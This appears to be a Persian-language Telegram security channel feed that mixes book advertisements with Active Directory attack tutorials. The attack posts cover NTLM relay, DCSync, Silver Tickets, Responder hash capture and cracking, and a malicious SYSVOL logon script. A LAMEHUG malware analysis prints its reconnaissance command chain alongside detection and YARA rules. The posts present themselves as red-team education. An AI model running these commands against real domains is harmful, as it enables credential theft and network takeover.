Open in Telegram
977
Subscribers
No data24 hours
+27 days
+130 days
Posts Archive
977
📖 وایرشارک برای ردتیمرها: از پایه تا پیشرفته
📚 عنوان کتاب: وایرشارک برای ردتیمرها (Wireshark for Red Teamers)
این کتاب یک راهنمای جامع و عملی برای یادگیری ابزار قدرتمند Wireshark است، با تمرکز ویژه روی کاربردهای آن در حوزه Red Teaming (تیم قرمز) و امنیت سایبری تهاجمی. کتاب از پایه شروع می کند و به مفاهیم پیشرفته مانند تحلیل ترافیک شبکه، شناسایی آسیبپذیریها، و تکنیکهای نفوذ می پردازد. محتوای اصلی کتاب شامل فصلهایی مانند معرفی Wireshark، درک ترافیک شبکه، تکنیکهای کپچرینگ پکتها، فیلترینگ، و کاربردهای عملی در Reconnaissance (شناسایی) و Command and Control (C2) است.
این کتاب مناسب چه کسانی است؟
ویژگی های کتاب ؟
چرا باید این کتاب را بخرید؟
دانلود فایل های تمرین و سناریوها
نمونه کتاب
توضیحات کامل را بخوانید .
💰 قیمت : ۲۵۰,۰۰۰ تومان
📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید:
@THBxSupport
977
ریــا حلال شمــارند و جــام بــاده حرام
زهی طریقت و ملت زهی شریعت و کیش
ریـای زاهد سالوس جان مــن فرسود
قدح بیار و بنه مرهمی بر این دل ریش.
•●حافظ شیرازی●•
روز بزرگداشت "حافظ شیرازی"
977
آماده سازی برای NTLM Relay از راه دور: Lateral Movement بدون NTLM و پورت 445/TCP
این مقاله یک سناریو واقعی از تست نفوذ را نشان میدهد که در آن مهاجم پس از دستیابی به دسترسی اولیه به یک سرور،با غیرفعال کردن عمدی سرویس های حیاتی NetLogon، LanManServer و LanManWorkstation، مسیر معمول NTLM Relay از طریق پورت 445 را مسدود می کند.
مراحل دقیق حمله:
1. غیرفعال کردن سرویسهای حیاتی:
sc stop netlogon sc stop lanmanserver sc config lanmanserver start= disabled sc stop lanmanworkstation sc config lanmanworkstation start= disabled2. تأیید بسته بودن پورت 445:
nmap -p 445 -sT -Pn <serverIP>
3. راه حل جایگزین - استفاده از Kerberos:
■ استخراج هشهای NTLM از LSA Secrets با secretsdump.py
■ به دست آوردن Domain SID با lookupsid.py
■ ساخت Silver Ticket با ticketer.py
4. دسترسی به سیستم تارگت:
■ استفاده از atexec-pro.py برای اجرای دستور از راه دور
■ آپلود و اجرای پیلود (msf_win_x64.exe)
⚠️ سلب مسئولیت:
این محتوا صرفاً برای اهداف آموزشی و در محیط های لابراتور مجاز ارائه می شود.
@KavehAPT977
🔥 جشن مهرگان یادآور پیروزی کاوه آهنگر و مردم بر ضحاک، نماد ظلم و بیداد است. کاوه آهنگر که از قتلعام پسرانش به دست سربازان ضحاک رنج میبرد، به دربار ضحاک آمد و اعتراض کرد. ضحاک که از او ترسیده بود، دستور آزادی آخرین پسر کاوه را داد و خواست او نیز اعتراف به عدالت ضحاک کند، اما کاوه نامه را پاره کرد و با پیشبند چرمیاش که نماد مقاومت بود روی نیزه به میان مردم رفت و آنها را به قیام علیه ضحاک فراخواند.
کاوه سپس به همراه مردم به نزد فریدون رفت که فریدون، از دودمان پیشدادی، با رهبری خود ضحاک را شکست داد و عدالت و آزادی را برقرار کرد. در فرهنگ ایرانی، کاوه آهنگر نماد آزادیخواهی و مقاومت در برابر ظلم، و ضحاک نماد ستم و جور مطرح شده است. پرچمی که کاوه با پیشبند چرمیاش بر نیزه بست بعدها به «درفش کاویانی» معروف شد و نماد اتحاد و مبارزه برای حق و آزادی گردید.
💰 ۲۰٪ تخفیف: ۲۰۰,۰۰۰ تومان برای این کتابها :
⭕ کتابچه "Mimikatz: تسلط عملی بر تکنیکهای پیشرفته حملات Active Directory" از مقدماتی تا پیشرفته.
⭕ وایرشارک برای ردتیمرها
💢 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید:
@THBxSupport
977
📖 Credential Dumping DCSync Attack
حمله Active Directory Credential Dumping (DCSync) تکنیکی تخصصی است که مهاجمین برای استخراج اعتبارنامهها از کنترلکننده دامنه (DC) بهکار میبرند، با این روش که خود را شبیه یک کنترلکننده دامنه نشان میدهند.
راهاندازی یک محیط آزمایشگاهی برای شبیه سازی حمله
درک پروتکل DRS و نحوه عملکرد حمله
چرایی وقوع این misconfiguration در دنیای واقعی
Exploiting از misconfiguration
نگاشت حمله به MITRE ATT&CK
Detecting حمله
استراتژی های کاهش خطر
راهاندازی لاب (Lab Setup)
نیازمندیها:
یک محیط مجازی سازی (مثلاً VMware، VirtualBox یا Hyper-V).
یک Windows Server که بهعنوان کنترلکننده دامنه پیکربندی شده باشد.
یک ماشین کلاینت ویندوز.
ابزارها: Impacket، Mimikatz، Netexec و Metasploit.
مراحل:
پیکربندی کنترلکننده دامنه:
ویندوز سرور را نصب و پیکربندی کنید تا بهعنوان کنترلکننده دامنه (DC) عمل کند؛ نام دامنه را مثلاً ignite.local قرار دهید و آدرس IP را بهصورت ایستا (static) تنظیم کنید مثلاً 192.168.1.48. AD را راهاندازی کنید و چند کاربر و گروه ایجاد کنید.
@KavehAPT
@TryHackBox
977
impacket-ntlmrelayx
مهاجم ممکن است از یک NTLM relay برای اجرای عملیات DCSync برای یک کاربر انتخابشده استفاده کند. وقتی یک حساب privileged ناخواسته با IP مهاجم ارتباط برقرار کند، ابزار impacket-ntlm میتواند credential را intercept کند. این امکان میدهد مهاجم Directory Services replica permission را به حسابی که کنترل آن را دارد اختصاص دهد و بهشدت سطح دسترسی شبکه را گسترش دهد.
شرح فنی و کاری که انجام میشود:
ntlmrelayx.py از مجموعه Impacket ابزاری است که توانایی رهگیری (relay) تاییدیههای NTLM را دارد: وقتی یک کلاینت سعی کند به سرویس مهاجم احراز هویت NTLM کند، ntlmrelayx میتواند آن احراز هویت را به سرویس دیگری relay کند تا بهعنوان آن کاربر عمل کند.
برای مثال، اگر سرویسهای شبکه (مثلاً یک سرور چاپ یا برنامه وب با NTLM) بهطور اشتباه کانفیگ شده باشند، مهاجم میتواند احراز هویت دریافتی از یک کاربر privileged را به DC یا به مکان دیگری relay کند و آنجا از آن استفاده کند مثلاً برای تغییر ACE یا افزودن DCSync right.
پس از relay موفق، مهاجم میتواند با creds relay شده امورات مدیریتی مثل افزودن ACE برای DCSync را انجام دهد.
این حمله معمولاً به جزئیات شبکه و دسترسی اولیه نیاز دارد (توانایی ایجاد یک سرویس فریبنده یا انجام poisoning).
@KavehAPT
977
impacket-ntlmrelayx
مهاجم ممکن است از یک NTLM relay برای اجرای عملیات DCSync برای یک کاربر انتخابشده استفاده کند. وقتی یک حساب privileged ناخواسته با IP مهاجم ارتباط برقرار کند، ابزار impacket-ntlm میتواند credential را intercept کند. این امکان میدهد مهاجم Directory Services replica permission را به حسابی که کنترل آن را دارد اختصاص دهد و بهشدت سطح دسترسی شبکه را گسترش دهد.
977
۴. تحلیل رفتاری:
الگوهای غیرعادی اجرای دستورات
تولید خودکار دستورات سیستمی
جمعآوری انبوه اطلاعات سیستمی
اقدامات حفاظتی
اقدامات فوری:
۱. مسدود کردن IoCهای شناختهشده (IPها، دامنهها، هش ها)
۲. نظارت بر دسترسی ها به API LLM
۳. تقویت کنترل پیوست های ایمیل
۴. بررسی دایرکتوری %PROGRAMDATA%\info\
اقدامات بلندمدت:
# مسدود کردن API LLM (اگر به طور قانونی استفاده نشود)
netsh advfirewall firewall add rule name="Block_LLM_APIs"
dir=out action=block remoteip=inference.huggingface.co
نظارت بر پروسس های مشکوک
wevtutil qe Security /q:"*[System[EventID=4688] and EventData[Data[@Name='NewProcessName'] and (contains(.,'wmic') or contains(.,'systeminfo'))]]"قوانین YARA برای شناسایی:
rule LAMEHUG_AI_Malware {
meta:
description = "شناسایی بدافزار مبتنی بر هوش مصنوعی LAMEHUG"
author = "تحقیقات امنیتی"
date = "2025-07-30"
strings:
$api1 = "inference.huggingface.co"
$api2 = "Qwen2.5-Coder"
$path = "%PROGRAMDATA%\\info\\info.txt"
$cmd1 = "systeminfo >>"
$cmd2 = "wmic computersystem"
condition:
2 of them
}
ارزش برای صنعت
عصر جدیدی از تهدیدها:
LAMEHUG
نشان دهنده تغییری اساسی در توسعه بدافزار است. استفاده از LLM برای تولید پویای دستورات، بدافزار را انطباق پذیرتر و سخت تر برای شناسایی میکند.
ریسکهای کلیدی:
- خودکارسازی حملات پیچیده بدون تخصص
- دور زدن سیگنچرهای استاتیک از طریق تولید پویا
- کاهش موانع ورود برای مجرمان سایبری
- مقیاس پذیری حملات شخصی سازی شده
تکامل حفاظت:
روشهای شناسایی سنتی مبتنی بر سیگنچرهای استاتیک، کمتر مؤثر میشوند. نیاز به گذار به تحلیل رفتاری و نظارت بر فعالیت هوش مصنوعی وجود دارد.
پیشبینیهای توسعه
آینده نزدیک:
- ادغام LLMهای قدرتمندتر (GPT-4، Claude)
- LLMهای محلی برای اجتناب از شاخص های شبکه ای
- تولید کد پلی مورفیک توسط هوش مصنوعی
- مهندسی اجتماعی خودکار
فناوریهای حفاظتی:
- سیستم های شناسایی مبتنی بر هوش مصنوعی
- تحلیل رفتاری استفاده از هوش مصنوعی
- نظارت و فیلترینگ API LLM
- تکنیک های هوش مصنوعی خصمانه
نتیجهگیری
LAMEHUG
آغاز عصر جدیدی در امنیت سایبری است. APT28 نشان داد که چگونه هوش مصنوعی میتواند برای ایجاد تهدیدهای پیچیدهتر و انطباقپذیرتر سلاح سازی شود.
نکات بحرانی:
- اولین مورد استفاده جنگی از LLM در بدافزار
- تولید پویای دستورات از طریق هوش مصنوعی
- کاهش موانع فنی برای مهاجمان
- نیاز به بازنگری رویکردهای حفاظتی
#APT28
@KavehAPT977
APT28 LAMEHUG
اولین بدافزار مجهز به هوش مصنوعی در طبیعت
گروه هکری روس APT28 (Forest Blizzard, UAC-0001) با توسعه اولین بدافزار عمومی مستندشده که از یک مدل زبانی بزرگ (LLM) بهره می برد، دوره جدیدی از حملات سایبری را معرفی کرده است. LAMEHUG فصل جدیدی در تاریخ بدافزارها گشوده است.
معماری فنی
اجزای اصلی:
- زبان برنامهنویسی: پایتون
- بستهبندی: PyInstaller (فایلهای .pif)
- مدل زبانی: Qwen 2.5-Coder-32B-Instruct
- رابط برنامهنویسی (API): Hugging Face Inference API
- روش تحویل: ایمیلهای فیشینگ حاوی فایلهای ZIP
رویکرد انقلابی:
LAMEHUG
دستورات متنی به زبان طبیعی را دریافت کرده و از طریق مدل زبانی آن ها را به دستورات سیستمی تبدیل می کند که روی دستگاه آلوده اجرا می شوند. این قابلیت امکان خودکارسازی وظایف پیچیده جاسوسی و سرقت دادهها را بدون نیاز به برنامهنویسی دستورات خاص فراهم میکند.
مکانیزم عملکرد
مرحله ۱: آلودگی
Appendix.pdf.zip → Appendix.pdf.pif → PyInstaller executableمرحله ۲: تولید دستورات توسط هوش مصنوعی بدافزار درخواستهایی را به Qwen 2.5-Coder از طریق API Hugging Face ارسال میکند: "تولید دستورات ویندوز برای جمعوآوری اطلاعات سیستمی شامل سختافزار، پروسس ها، سرویس ها و پیکربندی شبکه" مرحله ۳: اجرای دستورات تولید شده مدل زبانی دستورات آماده را باز می گرداند و LAMEHUG آن ها را از طریق cmd.exe اجرا میکند:
cmd.exe /c "mkdir %PROGRAMDATA%\info && systeminfo >> %PROGRAMDATA%\info\info.txt && wmic computersystem get name,manufacturer,model >> %PROGRAMDATA%\info\info.txt && wmic cpu get name,speed >> %PROGRAMDATA%\info\info.txt && wmic memorychip get capacity,speed >> %PROGRAMDATA%\info\info.txt && wmic diskdrive get model,size >> %PROGRAMDATA%\info\info.txt && wmic nic get name,macaddress,ipaddress >> %PROGRAMDATA%\info\info.txt && tasklist >> %PROGRAMDATA%\info\info.txt && net start >> %PROGRAMDATA%\info\info.txt && ipconfig /all >> %PROGRAMDATA%\info\info.txt && whoami /user >> %PROGRAMDATA%\info\info.txt && whoami /groups >> %PROGRAMDATA%\info\info.txt && net config workstation >> %PROGRAMDATA%\info\info.txt && dsquery user -samid %username% >> %PROGRAMDATA%\info\info.txt"مرحله ۴: جمع آوری و استخراج داده ها - جستجوی بازگشتی در پوشه های Documents، Desktop، Downloads - آماده سازی فایل ها برای استخراج - انتقال داده ها از طریق SFTP یا HTTP POST. گونههای بدافزار سه نسخه شناسایی شده است: 1. نسخه اصلی (Appendix.pdf.pif) - قابلیت پایه تولید دستورات توسط هوش مصنوعی - جمعآوری اطلاعات سیستمی - استخراج دادهها از طریق SFTP 2.AI_generator_uncensored_Canvas_PRO_v0.9.exe - قابلیتهای پیشرفته تر تولید دستورات - روش های جایگزین استخراج داده - دور زدن محدودیت های مدل زبانی 3. image.py - نسخه اسکریپت پایتون - منطق تغییر یافته برای استخراج - احتمالاً نسخه آزمایشی شاخص های فنی
آرتیفکت های فایل: - %PROGRAMDATA%\info\info.txt - اطلاعات سیستمی - Appendix.pdf.pif پیلود اصلی - AI_generator_uncensored_Canvas_PRO_v0.9.exe- نسخه جایگزین شاخص های شبکهای:
- سرورهای C2: 144.126.202.227, 192.36.27.37 - دامنهها: boroda70@meta.ua, stayathomeclasses.com - API: inference.huggingface.co (Qwen 2.5-Coder) - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0هش فایل ها:
- 8013b23cb78407675f323d54b6b8dfb2a61fb40fb13309337f5b662dbd812a - 766c356d6a4b00078a0293460c5967764fcd788da8c1cd1df708695f3a15b777 - a30930dfb655aa39c571c163ada65ba4dec30600df3bf548cc48bedd0e841416 - d6af1c9f5ce407e53ec73c8e7187ed804fb4f80cf8dbd6722fc69e15e135db2e - bdb33bbb4ea11884b15f67e5c974136e6294aa87459cdc276ac2eea85b1deaa3 - 384e8f3d300205546fb8c9b9224011b3b3cb71adc994180ff55e1e6416f65715روش های شناسایی 1. نظارت بر فعالیت فایل:
- Sysmon Event ID 11: ایجاد فایل در %PROGRAMDATA%\info\* - فایل های مشکوک در دایرکتوری های قابلنوشتن:
AppData، ProgramData، Users\Public2. شناسایی جاسوسی:
- اجرای چندین دستور شناسایی در بازه زمانی کوتاه: whoami, systeminfo, wmic, ipconfig, net, tasklist3. نظارت شبکهای:
- اتصالات به نقاط پایانی API مدلهای زبانی:
- inference.huggingface.co
- api.openai.com
- generativelanguage.googleapis.com
- api.anthropic.com`
@KavehAPT977
دوستان من درحال حاضر دسترسی به سیستم ندارم اگر لابراتور دارید و میتونید این ابزار اجرا کنید بهم پیام بدید یسری قابلیت جدید هم اضافه کردم که بهتره تست بشه هرکس میتونه پیام بده :
@Unique_exploitbot
977
💢 روز "بازگشایی آموزشگاها"
این روز خجسته را به همهی مردم ايران بزرگ شادباش میگویم.
به ویژه خانوادههایی که دانش آموز از پایه يکم دبستان تا آموزشگاهای بزرگ کشور را دارند.
آرزوی آبرومندی و رسیدن به برترین پایههای دانشیک و بهترین ها را آرزو داریم براتون.
به مناسبت این روز 50 درصد تخفیف روی کتاب هامون گذاشتیم تا همه دوستان از دانش بهره مند بشوند .
📖 کتابچه "Mimikatz: تسلط عملی بر تکنیکهای پیشرفته حملات Active Directory" از مقدماتی تا پیشرفته.
⭕ توضیحات
💰قیمت ۲۵۰,۰۰۰ تومن
💰قیمت با تخفیف ۱۲۵,۰۰۰ تومن
📖 وایرشارک برای ردتیمرها: از پایه تا پیشرفته
⭕ توضیحات + نمونه کتاب
💰قیمت ۲۵۰,۰۰۰ تومن
💰قیمت با تخفیف ۱۲۵,۰۰۰ تومن
📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید:
@THBxSupport
977
ADKAVEH چیست؟
یک اسکریپت PowerShell برای شناسایی و شبیه سازی حملات در Active Directory است. این ابزار به تیمهای امنیتی (Red/Blue) امکان بررسی محیط AD، پیدا کردن آسیبپذیری ها و شبیه سازی امن حملات رایج را میدهد.
چرا از ADKAVEH استفاده کنیم:
ترکیبی از شناسایی + شبیه سازی حمله در یک اسکریپت واحد.
سرعت ارزیابی امنیتی و تمرینات داخلی را افزایش می دهد.
تفاوت با PowerView:
حوزه کاری:
PowerView
بیشتر برای reconnaissance (نقشهبرداری کاربران، گروهها، ACLها) است.
ADKAVEH
علاوه بر آن ماژول های شبیه سازی حمله دارد (Kerberoast, AS-REP, Password Spray و تست های اختیاری Defender).
طراحی:
PowerView :
ماژول/کتابخانه
ADKAVEH :
اسکریپت تعاملی با گردش کار و کنترل های عملیاتی.
ایمنی:
ADKAVEH
تأیید و محدودیت نرخ داخلی است.
PowerView
ایمنی را به استفادهکننده واگذار می کند.
977
دوستان این اسکریپت قبلا نوشته بودم حال تغییرات و بهبود پیدا کرده امیدوارم براتون مفید باشه
ADKAVEH
— اسکریپت تست نفوذ Active Directory — فریم ورک شمارش و حمله روی Active Directory
ADKAVEH
یک اسکریپت جامع مبتنی بر PowerShell است که برای شمارش (enumeration) Active Directory، ارزیابی آسیبپذیری ها و انجام تستهای نفوذ مجاز طراحی شده است. این ابزار برای متخصصان امنیت، تیمهای قرمز (Red Teams) و تیمهای آبی (Blue Teams) ساخته شده و امکانات تعاملی ای فراهم میکند تا بردارهای حمله ی مرسوم در AD را شناسایی کنند، در حالی که امنیت عملیاتی را نیز حفظ میکند.
https://github.com/TryHackBox/ADKAVEH
#tools
@KavehAPT
977
⭕️ یادداشت های اکسپلویت از تست نفوذ Active Directory - بخش پایانی
حمله Force Change Password Attack
اگر برخی نام کاربری/رمز عبور و نام های کاربری دیگر را پیدا کردیم، ممکن است بتوانیم رمز عبور کاربران دیگر را تغییر دهیم. کاربر نیاز به مجوز GenericAll برای تغییر رمز عبور کاربران دیگر دارد.
# -U: User credential who has the permission to change another user password # -I: Target IP # -S: Target server name net rpc password "TargetUserName" "myPassw0rd@123" -U "UserName"%"Password" -I "10.0.0.1" -S "EXAMPLE.LOCAL"Microsoft Management Console (mmc) برای تنظیم AD، این دستورالعملها را دنبال کنید: ۱. روی آیکون ویندوز راست کلیک کنید. ۲. روی "Run" کلیک کنید و "mmc" را وارد کنید سپس "OK" را کلیک کنید. ۳. در MMC، روی "File → Add or Remove Snap-ins" کلیک کنید. ۴. تمام سه "Active Directory…" snap-in را اضافه کنید. ۵. روی "Active Directory…" در پنل سمت چپ راستکلیک کنید و "Change Forest" را انتخاب کنید. ۶. دامنه را به عنوان Root domain وارد کنید و OK را کلیک کنید. ۷. روی "View → Advanced Features" کلیک کنید. قرارداد نام گذاری (Naming Convention) اگر فهرست نام های کاربری در Active Directory را پیدا کردیم، میتوانیم نام های کاربری را با قرارداد نام گذاری تغییر دهیم. برای مثال:
john smith -> jsmith, j.smith, john.smith michael pole -> mpole, m.pole, michael.pole ssh dc.example.com\\<ad_username>@sub.dc.example.comتزریق اعتبارنامه ها به حافظه (Inject Credentials into Memory)
# /netonly: All network communications will use these injected credentials for authentication. runas.exe /netonly /user:<domain>\<username> cmd.exeپیکربندی DNS (DNS Configuration)
# PowerShell
$dnsip = "<DC_IP>"
$index = Get-NetAdapter -Name 'Ethernet' | Select-Object -ExpandProperty 'ifIndex'
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip
حالا بررسی کنید که پیکربندی به درستی تنظیم شده است.
دانش پایه (Basic Knowledge)
مدیریت کاربر (User Management)
(Delegation)
در Active Directory، مدیر میتواند کاربر دیگری را برای مدیریت کاربران در یک واحد سازمانی (OU) Delegation کند، بدون privileges مدیر.
تنظیم (Setup)
"Active Directory Users and Computers" را باز کنید.
روی OU تارگت راست کلیک کنید و روی “Delegate Control…” کلیک کنید. سپس پنجره جدید باز میشود.
در پنجره، نام کاربری که میخواهید privilege مدیریت کاربران را به او Delegation کنید، وارد کنید.
وظایفی را که کاربر واگذارشده(Delegation) باید مدیریت کند، انتخاب کنید.
OK را کلیک کنید.
مدیریت کاربران (Manage Users)
به عنوان کاربر واگذارشده وارد شوید.
برای مثال، اگر میخواهید رمز عبور john را بازنشانی کنید، دستور زیر را در PowerShell اجرا کنید. سپس رمز عبور جدید را در پرامپت وارد کنید.
Set-ADAccountPassword john -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose
اولین باری که John پس از آن وارد سیستم میشود، میخواهیم John رمز عبور دلخواه خود را تغییر دهد نه رمزی که شما وارد کردید. برای این کار، دستور زیر را اجرا کنید.
Set-ADUser -ChangePasswordAtLogon $true -Identity john -Verbose
حالا وقتی John وارد سیستم میشود، از او خواسته میشود رمز عبور جدیدی تغییر دهد.
رهگیری احراز هویت NetNTLM (Intercept NetNTLM Authentication)
Responder را شروع کنید تا برای هر درخواست LLMNR، NBT-NS، WPAD گوش کند.
sudo responder -I <interface-like-eth0>
Responder را تا دریافت برخی درخواستها در حال اجرا نگه دارید.
اگر هش NTLM را دریافت کردید، آن را در ماشین محلی کرک کنید.
echo -n '<copied-NTLM-hash>' > hash.txt
john --format=netntlmv2 --wordlist=wordlist.txt hash.txt
#NoteADExploit
@KavehAPT977
به مناسبت اینکه دیروز روز برنامه نویس بوده و این پیام با تاخیر ارسال شده .
📌 ۲۲ شهریور روز جهانی برنامه نویسان
به همین مناسبت، فقط به مدت چهار ساعت آینده روی محصولات آموزشی ما ۲۰٪ تخفیف ویژه اعمال شده است.
📖 کتابچه آموزشی: "Mimikatz – تسلط عملی بر تکنیک های پیشرفته حملات Active Directory"
🔹 سطح: مقدماتی تا پیشرفته
💰 قیمت اصلی: ۲۵۰,۰۰۰ تومان
💳 قیمت با تخفیف: ۲۰۰,۰۰۰ تومان
🔗 توضیحات
📖 کتاب آموزشی: "وایرشارک برای ردتیمرها: از پایه تا پیشرفته"
💰 قیمت اصلی: ۲۵۰,۰۰۰ تومان
💳 قیمت با تخفیف: ۲۰۰,۰۰۰ تومان
🔗 توضیحات
⏳ فرصت استفاده از تخفیف محدود است!
➖➖➖➖➖➖➖
📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید:
🆔 @THBxSupport
977
⭕ یادداشت های اکسپلویت از تست نفوذ Active Directory - بخش دوم
3. آپلود داده های جمعآوری شده (Upload Collected Data)
پس از اجرا، فایلهای نتیجه (*.json) در دایرکتوری فعلی تولید می شوند. تمام این فایلهای JSON را به BloodHound در مرورگر وب آپلود کنید.
میتوانیم روابط در Active Directory را کاوش کنیم.
بررسی (Investigation)
فهرست همه کاربران
net user /domain
net user <username> /domain
Get-ADUser -Filter *
Get-ADUser -Identity <username> -Server dc.example.com -Properties *
Get-ADUser -Filter 'Name -like "*michael"' -Server dc.example.com | Format-Table Name,SamAccountName -A
فهرست همه گروهها
net group /domain
net group "<group>" /domain
PS> Get-ADGroup -Identity <group> -Server dc.example.com -Properties *
PS> Get-ADGroupMember -Identity <group> -Server dc.example.com
فهرست سیاست رمز عبور
net accounts /domain
# فهرست اشیاء AD
$ChangeDate = New-Object DateTime(2022, 02, 28, 12, 00, 00)
Get-ADObject -Filter 'whenChanged -gt $ChangeDate' -includeDeletedObjects -Server dc.example.com
بازیابی اطلاعات در مورد دامنه داده شده.
Get-ADDomain -Server dc.example.com
تغییر رمز عبور کاربر AD
Set-ADAccountPassword -Identity <username> -Server dc.example.com -OldPassword (ConvertTo-SecureString -AsPlaintext "oldpass" -force) -NewPassword (ConvertTo-SecureString -AsPlaintext "newpass" -force)
# SYSVOL
یک پوشه اشتراکی که Group Policy Objects (GPOs) را ذخیره می کند.
dir \\dc.example.com\SYSVOL\
سوءاستفاده از اسکریپت ورود برای کاربران دیگر (Abuse Logon Script for Other Users)
اگر کاربر فعلی مجوز نوشتن اسکریپت ها در SYSVOL را داشته باشد، ممکن است بتوانیم مسیر اسکریپت ورود کاربران دیگر را تغییر دهیم.
1. بررسی مجوز
icacls C:\Windows\SYSVOL\sysvol\example.local\scripts\2. تغییر/اضافه کردن یک اسکریپت مخرب
'powershell -e <BASE64_COMMAND>' | OutFile -FilePath C:\Windows\SYSVOL\sysvol\example.local\scripts\evil.bat
3. تنظیم اسکریپت ورود برای کاربر مشخصشده
Set-ADUser -Identity VictimUser -ScriptPath '\\example.local\SYSVOL\example.local\scripts\evil.bat
هنگامی که کاربر دیگر وارد سیستم می شود، اسکریپت .bat اجرا خواهد شد.
#NoteADExploit
@KavehAPT